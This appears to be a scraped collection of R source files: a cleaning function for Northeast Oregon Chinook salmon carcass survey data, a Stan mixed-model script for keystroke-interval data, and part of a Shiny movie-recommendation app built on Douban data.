SurveyComments = paste0('Survey_Type: ', Survey_Type, '; ', Comments_SurveyEvent),
SampleNumber = GeneticsNumber,
HistoricSampleNumber = NA_character_,
CarcassSpecies = 'S_CHN',
Sex = case_when(
Sex == 'M' ~ 'Male',
Sex == 'F' ~ 'Female',
Sex == 'J' ~ 'Jack',
Sex %in% c('Unk', 'UNK') ~ 'Unknown'
),
ForkLength = ForkLength,
PercentSpawned = if_else(Sex == 'Male', NA_integer_, as.integer(round(PercentSpawned, 0))),
# SpawnedOut = case_when( # First Go - remove if other logic is best
# PreSpawn == 'Spawned' ~ 'Yes',
# PreSpawn == 'PreSpawn' ~ 'No',
# PreSpawn %in% c('', 'NotValid', 'Unknown') ~ 'Unknown',
# TRUE ~ NA_character_
# ),
SpawnedOut = case_when( # anti-PrespawnMort?
PercentSpawned < 50 ~ 'No', # Indicates a Prespawn Mortality
PercentSpawned >= 50 ~ 'Yes', # Successful Spawner
TRUE ~ NA_character_
),
OpercleLeft = if_else(grepl('LOP', OperclePunchType, ignore.case = T),
str_extract(OperclePunchType, '\\d?\\s*LOP'), NA_character_),
OpercleRight = if_else(grepl('ROP', OperclePunchType, ignore.case = T),
str_extract(OperclePunchType, '\\d?\\s*ROP'), NA_character_),
PITScanned = case_when(
PITscan == 'PIT tag present' ~ 'Yes',
PITscan == 'No PIT tag' ~ 'No',
PITscan == 'Not Scanned' ~ 'Unknown',
),
PITCode = PIT1, # no data in PIT2
AdiposeFinClipped = case_when( # Assuming all Hatchery fish are ad-clipped
grepl('ad', FinMark, ignore.case = T) ~ 'Yes',
grepl('unk', FinMark, ignore.case = T) | FinMark == '' ~ 'Unknown',
TRUE ~ 'No'
),
CWTScanned = if_else(`CWT(Y/N)` == 'Unk', 'Unknown', `CWT(Y/N)`),
SnoutCollected = case_when( # This may need to be revisited
grepl('\\d{2}[[:alpha:]]{1}\\d{4}', SnoutID) ~ 'Yes',
grepl('DB\\d{3}', SnoutID) ~ 'Yes',
TRUE ~ 'No'
),
Fins = NA_character_,
Scales = NA_character_,
Otolith = NA_character_,
Count = as.double(Count),
CarcassComments = Comments,
Latitude = NA_character_, # no lat/long for carcasses
Longitude = NA_character_,
RadioTag = if_else(RadioTag == 1, 'Yes', 'No'),
TransmitterType = NA_character_,
Vendor = NA_character_,
SerialNumber = NA_character_,
Frequency = NA_character_,
Channel = NA_character_,
Code = NA_character_,
TagsFloy = NA_character_,
TagsVIE = NA_character_,
TagsJaw = NA_character_,
TagsStaple = NA_character_, # didn't see anything in the database
TagsSpaghetti = NA_character_,
MarksVentralFin = NA_character_, # Extract LV/RV from FinMark ****************
Notes = NA_character_,
QAStatusId = NA_integer_,
CWTCode = CWTcode,
TagsPetersonDisk = NA_character_, # didn't see anything in the database
CarcassWPT = as.character(CarcassID),
DNACollected = NA_character_, # won't affect analysis
ActivityQAStatusId = NA_integer_,
ActivityQAComments = NA_character_,
FieldsheetLink = as.logical(NA),
QAStatusName = NA_character_,
EffDt = NA_character_,
Year = as.integer(Year),
AboveWeir = case_when(
is.na(AboveOrBelowWeir) | AboveOrBelowWeir == '' ~ NA_character_,
AboveOrBelowWeir %in% c('Above Weir', 'Diversion','Lostine Weir') ~ 'Yes',
AboveOrBelowWeir %in% c('Below Weir', 'BeforeWeir', 'No Weir', 'No weir', 'Now Weir') ~ 'No',
TRUE ~ 'Unknown'
),
AbovePITArray = 'Yes', # WR2 = Wallowa River Site, Wenaha=Yes, Minam=Yes. Imnaha=Yes.
AboveRST = case_when(
River %in% c('Wenaha River','Wallowa River') ~ 'No',
TribToName == 'Wallowa River' & !River %in% c('Minam River','Lostine River') ~ 'No',
River == 'Lostine River' & SiteID %in% c('LOS8','LOS8.1','LOS8.2','LOSW','LOSTULLEY') ~ 'No',
TRUE ~ 'Yes'
),
Origin = case_when(
Origin %in% c('Nat') ~ 'Natural',
# HON are non-clipped fish that weren't scanned in 2011. Assumed to be Naturals, but not positive b/c no CWT Scan.
Origin %in% c('DS.Hat','Hat') ~ 'Hatchery', # DS.Hat = hatchery determined by Discriminate Scale Analysis...
# ...where hatchery was determined by the distance between the origin and first annulus..
TRUE ~ 'Unknown' # HON = Unknown
),
Mark_Discernible = case_when(
OPPunch %in% c('Yes','No','yes','no', 'NO')
& MarkRecapSizeCategory %in% c('Adult','Jack','MiniJ') ~ TRUE,
TRUE ~ FALSE),
#OPPunch is the NEOR field for whether the passed upstream mark(s) are discernible on the carcass
#MarkRecapSizeCategory is the NEOR bread-crumb trail of whether to include/exclude carcasses in MR analyses
#we could use the MarkRecapSizeCategory criteria during cleaning or when stratifying data for input into cuyem functions
#using MarkRecapSizeCategory later would be more straightforward, otherwise we are hiding info that doesn't have anything to do
#with whether the mark is discernable, e.g., it was a radio-tagged carcass that was only found because of it's radio-tag
#similarly, above/below weir probably doesn't need to be incorporated into this variable
#but it all depends on how Kinzer wants to use the variable
Recapture = case_when(
Mark_Discernible == TRUE & OPPunch %in% c('Yes','yes') ~ TRUE,
TRUE ~ FALSE),
MR_strata = MarkRecapSizeCategory,
CWT_Age = ifelse(CWTAge>0,CWTAge, NA),
VIE_Age = NA_integer_,
PIT_Age = ifelse(PITage>0,PITage, NA),
Fin_Age = NA_integer_,
Scale_Age = ifelse(BestScaleAge>0,BestScaleAge, NA)
) %>%
# filter(MarkRecapSizeCategory %in% c('Adult','Adult NA')) %>% # This probably won't live here forever.
select(
ESU_DPS,
MPG,
POP_NAME,
TRT_POPID,
Species,
Run,
ReportingGroup,
StreamName,
TribToName,
LocationLabel,
TransectName,
SurveyYear,
SurveyDate,
ActivityDate,
ActivityId,
DatasetId,
LocationId,
TargetSpecies,
Pass,
StartSurvey,
EndSurvey,
StartTime,
EndTime,
Observers,
SurveyMethod,
GPSUnit,
Datum,
Weather,
Visibility,
SurveyComments,
SampleNumber,
HistoricSampleNumber,
CarcassSpecies,
Sex,
ForkLength,
SpawnedOut,
PercentSpawned,
OpercleLeft,
OpercleRight,
PITScanned,
PITCode,
AdiposeFinClipped,
CWTScanned,
SnoutCollected,
Fins,
Scales,
Otolith,
Count,
CarcassComments,
Latitude,
Longitude,
RadioTag = RadioTag,
TransmitterType,
Vendor,
SerialNumber,
Frequency,
Channel,
Code,
TagsFloy,
TagsVIE,
TagsJaw,
TagsStaple,
TagsSpaghetti,
MarksVentralFin,
Notes,
QAStatusId,
CWTCode,
TagsPetersonDisk,
CarcassWPT,
DNACollected,
ActivityQAStatusId,
ActivityQAComments,
FieldsheetLink,
QAStatusName,
EffDt,
Year,
AboveWeir,
AbovePITArray,
AboveRST,
Origin,
Mark_Discernible,
Recapture,
MR_strata,
CWT_Age,
VIE_Age,
PIT_Age,
Fin_Age,
Scale_Age)
return(data_clean)
}
| /R/clean_CarcassData_NEOR.R | no_license | ryankinzer/cuyem | R | false | false | 10,842 | r | #' @title Clean North East Oregon Carcass Data - from ODFW Access DB
#' @description Processes the raw ODFW Access DB carcass dataset and standardizes to join with clean_carcassData(CDMS_dat)
#' @param data Data obtained from premade query in ODFW Access DB. !!Export data as text file, comma separated, headers included.!!
#' @param data Import text file with: read.delim(file = 'path_to_file.txt', sep = ',', header = TRUE)
#' @export
#' @import dplyr lubridate
#' @author Tyler T. Stright
#' @examples
#' clean_carcass_Data(car_dat)
#'
clean_carcassData_NEOR <- function(data){
{if(is.null(data))stop("carcass data must be supplied")}
# NOTE: Fields not captured from carcass query: "Subbasin" "MEPSlength" "CWTAge" "BestAge" "PITage" "LengthAge" "AgeKey"
# "PIT2" "BestScaleAge" "Adult_or_Jack" "MarkRecapSizeCategory" "TagFile" "ExternalMarks" "Population"
# filter for GRSME only?
#WHERE(b.Subbasin IN ('Imnaha', 'Wallowa-Lostine', 'Wilderness-Wenaha', 'Wilderness-Minam'))
data_clean <- data %>%
mutate(
ESU_DPS = 'Snake River Spring/Summer-run Chinook Salmon ESU',
MPG = 'Grande Ronde / Imnaha',
POP_NAME = case_when(
River %in% c('Big Sheep Creek', 'Lick Creek', 'Little Sheep Creek') ~ 'Big Sheep Creek',
River == 'Imnaha River' ~ 'Imnaha River mainstem',
River %in% c('Bear Creek', 'Hurricane Creek', 'Lostine River', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'Lostine River',
River == 'Minam River' ~ 'Minam River',
River == 'Wenaha River' ~ 'Wenaha River'
),
TRT_POPID = case_when(
River %in% c('Bear Creek', 'Hurricane Creek', 'Lostine River', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'GRLOS',
River == 'Minam River' ~ 'GRMIN',
River == 'Wenaha River' ~ 'GRWEN',
River %in% c('Big Sheep Creek', 'Lick Creek', 'Little Sheep Creek') ~ 'IRBSH',
River == 'Imnaha River' ~ 'IRMAI'
),
Species = 'Chinook salmon',
Run = 'Spring/summer',
ReportingGroup = case_when( # in between tributary and population: transect/tributary/reporting group/population/mpg/esu
River %in% c('Big Sheep Creek', 'Lick Creek','Little Sheep Creek') ~ 'Big Sheep Creek',
River == 'Imnaha River' ~ 'Imnaha River',
River == 'Lostine River' ~ 'Lostine River',
River == 'Minam River' ~ 'Minam River',
River %in% c('Bear Creek', 'Hurricane Creek', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'Wallowa River',
River == 'Wenaha River' ~ 'Wenaha River'
),
StreamName = River,
TribToName = case_when(
River %in% c('Little Sheep Creek', 'Lick Creek') ~ 'Big Sheep Creek',
River %in% c('Wallowa River','Wenaha River') ~ 'Grande Ronde River',
River == 'Big Sheep Creek' ~ 'Imnaha River',
River == 'Imnaha River' ~ 'Snake River',
River %in% c('Bear Creek', 'Lostine River', 'Hurricane Creek', 'Minam River', 'Prairie Creek', 'Parsnip Creek', 'Spring Creek') ~ 'Wallowa River'
),
LocationLabel = Section,
TransectName = SiteID,
SurveyDate = lubridate::ymd(gsub('T00:00:00', '', SurveyDate)),
SurveyYear = lubridate::year(SurveyDate),
ActivityDate = paste0(SurveyDate, 'T00:00:00'),
ActivityId = as.integer(SurveyID),
DatasetId = NA_integer_,
LocationId = NA_integer_,
TargetSpecies = 'S_CHN',
Pass = NA_integer_,
StartSurvey = NA_character_,
EndSurvey = NA_character_,
StartTime = Start_Time,
EndTime = End_Time,
Observers = Surveyors,
SurveyMethod = 'Ground',
GPSUnit = NA_character_, # No GPS for Carcasses.
Datum = NA_character_,
Weather = NA_character_,
Visibility = Visibility,
SurveyComments = paste0('Survey_Type: ', Survey_Type, '; ', Comments_SurveyEvent),
SampleNumber = GeneticsNumber,
HistoricSampleNumber = NA_character_,
CarcassSpecies = 'S_CHN',
Sex = case_when(
Sex == 'M' ~ 'Male',
Sex == 'F' ~ 'Female',
Sex == 'J' ~ 'Jack',
Sex %in% c('Unk', 'UNK') ~ 'Unknown'
),
ForkLength = ForkLength,
PercentSpawned = if_else(Sex == 'Male', NA_integer_, as.integer(round(PercentSpawned, 0))),
# SpawnedOut = case_when( # First Go - remove if other logic is best
# PreSpawn == 'Spawned' ~ 'Yes',
# PreSpawn == 'PreSpawn' ~ 'No',
# PreSpawn %in% c('', 'NotValid', 'Unknown') ~ 'Unknown',
# TRUE ~ NA_character_
# ),
SpawnedOut = case_when( # anti-PrespawnMort?
PercentSpawned < 50 ~ 'No', # Indicates a Prespawn Mortality
PercentSpawned >= 50 ~ 'Yes', # Successful Spawner
TRUE ~ NA_character_
),
OpercleLeft = if_else(grepl('LOP', OperclePunchType, ignore.case = T),
str_extract(OperclePunchType, '\\d?\\s*LOP'), NA_character_),
OpercleRight = if_else(grepl('ROP', OperclePunchType, ignore.case = T),
str_extract(OperclePunchType, '\\d?\\s*ROP'), NA_character_),
PITScanned = case_when(
PITscan == 'PIT tag present' ~ 'Yes',
PITscan == 'No PIT tag' ~ 'No',
PITscan == 'Not Scanned' ~ 'Unknown',
),
PITCode = PIT1, # no data in PIT2
AdiposeFinClipped = case_when( # Assuming all Hatchery fish are ad-clipped
grepl('ad', FinMark, ignore.case = T) ~ 'Yes',
grepl('unk', FinMark, ignore.case = T) | FinMark == '' ~ 'Unknown',
TRUE ~ 'No'
),
CWTScanned = if_else(`CWT(Y/N)` == 'Unk', 'Unknown', `CWT(Y/N)`),
SnoutCollected = case_when( # This may need to be revisited
grepl('\\d{2}[[:alpha:]]{1}\\d{4}', SnoutID) ~ 'Yes',
grepl('DB\\d{3}', SnoutID) ~ 'Yes',
TRUE ~ 'No'
),
Fins = NA_character_,
Scales = NA_character_,
Otolith = NA_character_,
Count = as.double(Count),
CarcassComments = Comments,
Latitude = NA_character_, # no lat/long for carcasses
Longitude = NA_character_,
RadioTag = if_else(RadioTag == 1, 'Yes', 'No'),
TransmitterType = NA_character_,
Vendor = NA_character_,
SerialNumber = NA_character_,
Frequency = NA_character_,
Channel = NA_character_,
Code = NA_character_,
TagsFloy = NA_character_,
TagsVIE = NA_character_,
TagsJaw = NA_character_,
TagsStaple = NA_character_, # didn't see anything in the database
TagsSpaghetti = NA_character_,
MarksVentralFin = NA_character_, # Extract LV/RV from FinMark ****************
Notes = NA_character_,
QAStatusId = NA_integer_,
CWTCode = CWTcode,
TagsPetersonDisk = NA_character_, # didn't see anything in the database
CarcassWPT = as.character(CarcassID),
DNACollected = NA_character_, # won't affect analysis
ActivityQAStatusId = NA_integer_,
ActivityQAComments = NA_character_,
FieldsheetLink = as.logical(NA),
QAStatusName = NA_character_,
EffDt = NA_character_,
Year = as.integer(Year),
AboveWeir = case_when(
is.na(AboveOrBelowWeir) | AboveOrBelowWeir == '' ~ NA_character_,
AboveOrBelowWeir %in% c('Above Weir', 'Diversion','Lostine Weir') ~ 'Yes',
AboveOrBelowWeir %in% c('Below Weir', 'BeforeWeir', 'No Weir', 'No weir', 'Now Weir') ~ 'No',
TRUE ~ 'Unknown'
),
AbovePITArray = 'Yes', # WR2 = Wallowa River Site, Wenaha=Yes, Minam=Yes. Imnaha=Yes.
AboveRST = case_when(
River %in% c('Wenaha River','Wallowa River') ~ 'No',
TribToName == 'Wallowa River' & !River %in% c('Minam River','Lostine River') ~ 'No',
River == 'Lostine River' & SiteID %in% c('LOS8','LOS8.1','LOS8.2','LOSW','LOSTULLEY') ~ 'No',
TRUE ~ 'Yes'
),
Origin = case_when(
Origin %in% c('Nat') ~ 'Natural',
# HON are non-clipped fish that weren't scanned in 2011. Assumed to be Naturals, but not positive b/c no CWT Scan.
Origin %in% c('DS.Hat','Hat') ~ 'Hatchery', # DS.Hat = hatchery determined by Discriminate Scale Analysis...
# ...where hatchery was determined by the distance between the origin and first annulus..
TRUE ~ 'Unknown' # HON = Unknown
),
Mark_Discernible = case_when(
OPPunch %in% c('Yes','No','yes','no', 'NO')
& MarkRecapSizeCategory %in% c('Adult','Jack','MiniJ') ~ TRUE,
TRUE ~ FALSE),
#OPPunch is the NEOR field for whether the passed upstream mark(s) are discernible on the carcass
#MarkRecapSizeCategory is the NEOR bread-crumb trail of whether to include/exclude carcasses in MR analyses
#we could use the MarkRecapSizeCategory criteria during cleaning or when stratifying data for input into cuyem functions
#using MarkRecapSizeCategory later would be more straightforward, otherwise we are hiding info that doesn't have anything to do
#with whether the mark is discernable, e.g., it was a radio-tagged carcass that was only found because of it's radio-tag
#similarly, above/below weir probably doesn't need to be incorporated into this variable
#but it all depends on how Kinzer wants to use the variable
Recapture = case_when(
Mark_Discernible == TRUE & OPPunch %in% c('Yes','yes') ~ TRUE,
TRUE ~ FALSE),
MR_strata = MarkRecapSizeCategory,
CWT_Age = ifelse(CWTAge>0,CWTAge, NA),
VIE_Age = NA_integer_,
PIT_Age = ifelse(PITage>0,PITage, NA),
Fin_Age = NA_integer_,
Scale_Age = ifelse(BestScaleAge>0,BestScaleAge, NA)
) %>%
# filter(MarkRecapSizeCategory %in% c('Adult','Adult NA')) %>% # This probably won't live here forever.
select(
ESU_DPS,
MPG,
POP_NAME,
TRT_POPID,
Species,
Run,
ReportingGroup,
StreamName,
TribToName,
LocationLabel,
TransectName,
SurveyYear,
SurveyDate,
ActivityDate,
ActivityId,
DatasetId,
LocationId,
TargetSpecies,
Pass,
StartSurvey,
EndSurvey,
StartTime,
EndTime,
Observers,
SurveyMethod,
GPSUnit,
Datum,
Weather,
Visibility,
SurveyComments,
SampleNumber,
HistoricSampleNumber,
CarcassSpecies,
Sex,
ForkLength,
SpawnedOut,
PercentSpawned,
OpercleLeft,
OpercleRight,
PITScanned,
PITCode,
AdiposeFinClipped,
CWTScanned,
SnoutCollected,
Fins,
Scales,
Otolith,
Count,
CarcassComments,
Latitude,
Longitude,
RadioTag = RadioTag,
TransmitterType,
Vendor,
SerialNumber,
Frequency,
Channel,
Code,
TagsFloy,
TagsVIE,
TagsJaw,
TagsStaple,
TagsSpaghetti,
MarksVentralFin,
Notes,
QAStatusId,
CWTCode,
TagsPetersonDisk,
CarcassWPT,
DNACollected,
ActivityQAStatusId,
ActivityQAComments,
FieldsheetLink,
QAStatusName,
EffDt,
Year,
AboveWeir,
AbovePITArray,
AboveRST,
Origin,
Mark_Discernible,
Recapture,
MR_strata,
CWT_Age,
VIE_Age,
PIT_Age,
Fin_Age,
Scale_Age)
return(data_clean)
}
|
# Load packages
library(tidyverse)
library(rstan)
library(plyr)
library(loo)
library(magrittr)
rstan_options(auto_write = TRUE)
options(mc.cores = parallel::detectCores())
setwd("CopyTask2019/")
# Sampling parameters
set.seed(125)
n_chain = 3
n_cores = 3
iterations = 10000
# Load df
d <- read_csv("data/ct.csv") %>%
filter(IKI > 0,
target == 1
) %>%
group_by( subj, bigram, component ) %>%
dplyr::summarise(IKI = mean(IKI),
N = n()) %>%
ungroup(); d
d$component <- d %$% factor(component, levels = c("Tapping", "Sentence", "HF", "LF", "Consonants"), ordered = TRUE)
# Data as list for stan input
components <- d %$% as.numeric(mapvalues(component, from = levels(component), to= 1:length(unique(component))))
dat <- within( list(),
{
N <- nrow(d)
y <- d$IKI # DV
components <- components
K <- max(components)
subj <- d$subj
S <- max(d$subj)
bigram <- as.integer(factor(d$bigram))
B <- length(unique(d$bigram))
} );str(dat)
start <-
function(chain_id = 1){
list(beta = rep(mean(log(dat$y)), dat$K)
, sigma = rep(sd(log(dat$y)), dat$K)
, z_u = matrix(rep(0.1,dat$S*dat$K), nrow = dat$K),
w = rep(0.1, length(unique(d$bigram))),
L_u = matrix(rep(0, dat$K*dat$K), nrow = dat$K),
sigma_u = rep(1, dat$K),
sigma_w = 1,
alpha = chain_id
)
}
start_ll <- lapply(1:n_chain, function(id) start(chain_id = id) )
# --------------
# Stan model ##
# --------------
# Load model
lmm <- stan_model(file = "stanin/LMMcompvariance.stan")
# Check model
#m <- sampling(lmm, chain = 1, iter = 1, data = dat)
# Fit model
m <- sampling(lmm,
data = dat,
init = start_ll,
iter = iterations,
warmup = iterations/2,
chains = n_chain,
cores = n_cores,
refresh = 250,
thin = 1,
save_warmup = FALSE,
include = FALSE,
pars = c("mu", "L_u", "z_u", "sigma_comp"),
seed = 81,
control = list(max_treedepth = 16,
adapt_delta = 0.99)
)
#Save model
saveRDS(m,
file="stanout/LMMsubjintercepts.rda",
compress="xz")
# Extract and save posterior and log likelihood seperately
# Get log likelihood
log_lik <- extract_log_lik(m)
saveRDS(log_lik,
file = "stanout/log_lik/LMMvar_loglik.rda",
compress = "xz")
# Get parameter posterior
param <- c("beta", "sigma")
samps <- as.data.frame(m, pars = param)
saveRDS(samps,
file = "stanout/posterior/LMMvar_posterior.rda",
compress = "xz")
# Get random effects
param <- c("u", "w", "sigma_u", "sigma_w")
re <- as.data.frame(m, pars = param)
saveRDS(re,
file = "stanout/RE/LMMvar_re.rda",
compress = "xz")
# Get posterior predicted values
param <- c("y_tilde")
y_tilde <- as.data.frame(m, pars = param)
saveRDS(y_tilde,
file = "stanout/y_tilde/LMMvar_y_tilde.rda",
compress = "xz")
| /CT/scripts/LMMcompvariance.R | no_license | jensroes/Copy-task-analysis | R | false | false | 3,187 | r | # Load packages
library(tidyverse)
library(rstan)
library(plyr)
library(loo)
library(magrittr)
rstan_options(auto_write = TRUE)
options(mc.cores = parallel::detectCores())
setwd("CopyTask2019/")
# Sampling parameters
set.seed(125)
n_chain = 3
n_cores = 3
iterations = 10000
# Load df
d <- read_csv("data/ct.csv") %>%
filter(IKI > 0,
target == 1
) %>%
group_by( subj, bigram, component ) %>%
dplyr::summarise(IKI = mean(IKI),
N = n()) %>%
ungroup(); d
d$component <- d %$% factor(component, levels = c("Tapping", "Sentence", "HF", "LF", "Consonants"), ordered = TRUE)
# Data as list for stan input
components <- d %$% as.numeric(mapvalues(component, from = levels(component), to= 1:length(unique(component))))
dat <- within( list(),
{
N <- nrow(d)
y <- d$IKI # DV
components <- components
K <- max(components)
subj <- d$subj
S <- max(d$subj)
bigram <- as.integer(factor(d$bigram))
B <- length(unique(d$bigram))
} );str(dat)
start <-
function(chain_id = 1){
list(beta = rep(mean(log(dat$y)), dat$K)
, sigma = rep(sd(log(dat$y)), dat$K)
, z_u = matrix(rep(0.1,dat$S*dat$K), nrow = dat$K),
w = rep(0.1, length(unique(d$bigram))),
L_u = matrix(rep(0, dat$K*dat$K), nrow = dat$K),
sigma_u = rep(1, dat$K),
sigma_w = 1,
alpha = chain_id
)
}
start_ll <- lapply(1:n_chain, function(id) start(chain_id = id) )
# --------------
# Stan model ##
# --------------
# Load model
lmm <- stan_model(file = "stanin/LMMcompvariance.stan")
# Check model
#m <- sampling(lmm, chain = 1, iter = 1, data = dat)
# Fit model
m <- sampling(lmm,
data = dat,
init = start_ll,
iter = iterations,
warmup = iterations/2,
chains = n_chain,
cores = n_cores,
refresh = 250,
thin = 1,
save_warmup = FALSE,
include = FALSE,
pars = c("mu", "L_u", "z_u", "sigma_comp"),
seed = 81,
control = list(max_treedepth = 16,
adapt_delta = 0.99)
)
#Save model
saveRDS(m,
file="stanout/LMMsubjintercepts.rda",
compress="xz")
# Extract and save posterior and log likelihood seperately
# Get log likelihood
log_lik <- extract_log_lik(m)
saveRDS(log_lik,
file = "stanout/log_lik/LMMvar_loglik.rda",
compress = "xz")
# Get parameter posterior
param <- c("beta", "sigma")
samps <- as.data.frame(m, pars = param)
saveRDS(samps,
file = "stanout/posterior/LMMvar_posterior.rda",
compress = "xz")
# Get random effects
param <- c("u", "w", "sigma_u", "sigma_w")
re <- as.data.frame(m, pars = param)
saveRDS(re,
file = "stanout/RE/LMMvar_re.rda",
compress = "xz")
# Get posterior predicted values
param <- c("y_tilde")
y_tilde <- as.data.frame(m, pars = param)
saveRDS(y_tilde,
file = "stanout/y_tilde/LMMvar_y_tilde.rda",
compress = "xz")
|
###Load library
library(shiny)
library(shinyjs)
library(tidyverse)
library(plyr)
library(data.table)
###Data and environment preparation
movie_all = read.table("./data/movie_all.rdata")
header1 = read.table("./data/movie_cor.rdata", header = TRUE, nrow = 1)
movie_cor = fread("./data/movie_cor.rdata", skip=1, header=FALSE)[,-1]
setnames(movie_cor, colnames(header1))
colnames(movie_cor) = gsub("X(\\d+)","\\1",colnames(movie_cor))
rownames(movie_cor) = colnames(movie_cor)
header2 = read.table("./data/movie_cor2.rdata", header = TRUE, nrow = 1)
movie_cor2 = fread("./data/movie_cor2.rdata", skip=1, header=FALSE)[,-1]
setnames(movie_cor2, colnames(header2))
colnames(movie_cor2) = gsub("X(\\d+)","\\1",colnames(movie_cor2))
rownames(movie_cor2) = colnames(movie_cor2)
people_all = fread("./data/people_all.csv")
settle_cluster = read_rds("./data/settle_cluster.rdata")
movie_cluster = read.table("./data/movie_cluster.rdata")
docu =data.frame(score=c(1), id = c(1)) ###Initialization the user-docu-vector!!!
write.table(docu,"./data/docu.rdata") ###Initialization the user-docu-vector!!!
create_movies = function(){
docu2 <- read.table("/Applications/学习/UWM/new479/douban_public/douban_public/shiny_2/data/docu.rdata")
docu3 = docu2[-1,]
scored = docu3$score
scored_id = docu3$id
movie_recon <- function(movie_cor){
n = length(movie_cor[,1])
names_in = as.numeric(colnames(movie_cor)[colnames(movie_cor) %in% scored_id])
score_frame = data.frame(id = names_in) %>% left_join(docu3, by = "id")
score_vector = numeric(n)
score_vector[which(colnames(movie_cor) %in% scored_id)] = score_frame$score
Movie_1 = (movie_cor - diag(rep(1,n))) %*% t(t(score_vector))
Location = as.numeric(colnames(movie_cor) %in% scored_id)
Movie_2 = (movie_cor - diag(rep(1,n))) %*% t(t(Location))
Movie = Movie_1/Movie_2
Movie_pool = Movie[!(rownames(Movie) %in% scored_id),]
recon_id = as.numeric(names(Movie_pool))[tail(order(Movie_pool), n=3)]
return(recon_id)
}
return(c(movie_recon(movie_cor), movie_recon(movie_cor2)))
}
function(input, output, session) {
observeEvent(input$refresh, {
input$save_inputs =0
docu2 <- read.table("./data/docu.rdata")
if (length(docu2) <=10 ){
id = sample(c(settle_cluster[[1]],settle_cluster[[2]],settle_cluster[[3]]),1)
}else if((length(docu2)-10)%%6 == 1){
id_list = create_movies()
id = sample(id_list,1)
id_list = id_list[id_list!=id]
}else{
id = sample(id_list,1)
id_list = id_list[id_list!=id]
}
poster = movie_all[movie_all$id==id, 'poster']
output$movie_info_main <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
observeEvent(input$save_inputs, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_score))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = id))
write.table(docu2, "./data/docu.rdata")
})
user_rate <- eventReactive(input$save_inputs, as.numeric(gsub('(\\d).+?','\\1',input$user_score)))
output$real_rate <- renderUI(
if(user_rate()<=2){
tags$h3(user_rate())
}
)
###Comment_block
observeEvent(input$side, {
comment = people_all[people_all$movie_id == id,]
comment = comment[!is.na(comment$movie_score),]
comment$movie_comment = as.character(comment$movie_comment)
comment = comment[comment$movie_comment!="",]
output$movie_inspect5<-renderTable({
comment[comment$movie_score==5,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect4<-renderTable({
comment[comment$movie_score==4,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect3<-renderTable({
comment[comment$movie_score==3,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect2<-renderTable({
comment[comment$movie_score==2,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect1<-renderTable({
comment[comment$movie_score==1,c('movie_comment','movie_time','user_id')]
})
})
###Dist_block
observeEvent(input$side, {
x = 1:5
y = select(movie_all[movie_all$id==id,],starts_with('rating'))
y = sapply(y, function(x) as.numeric(sub("%", "", x))/100)
y = rev(y)
a = data.frame(x = x, y = y)
output$user_dist <- renderPlot({
ggplot(a, mapping = aes(x = x, y = y)) + geom_smooth(col='royalblue')+
theme_hc() + geom_point(x=user_rate(),y=0, col='tomato',
alpha = 0.25, cex=5)
})
})
###Movie_might_block
observeEvent(input$side, {
###BY_movie_block
poster_list=c()
cor_list = movie_cor[id==rownames(movie_cor),]
movie_might = names(cor_list)[tail(order(cor_list))][1:5]
output$movie_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[1],'poster'])
})
observeEvent(input$movie_select1,{
id = movie_might[1]
output$movie_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might1, {
#docu3 <- read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score1))
print(user_rate)
docu2 <<- rbind(docu2, data.frame(score=user_rate, id = movie_might[1]))
write.table(docu2, "./data/docu.rdata")
})
user_rate <- eventReactive(input$save_movie_might1, as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score1)))
output$movie_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[2],'poster'])
})
observeEvent(input$movie_select2,{
id = movie_might[2]
output$movie_might_info2 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
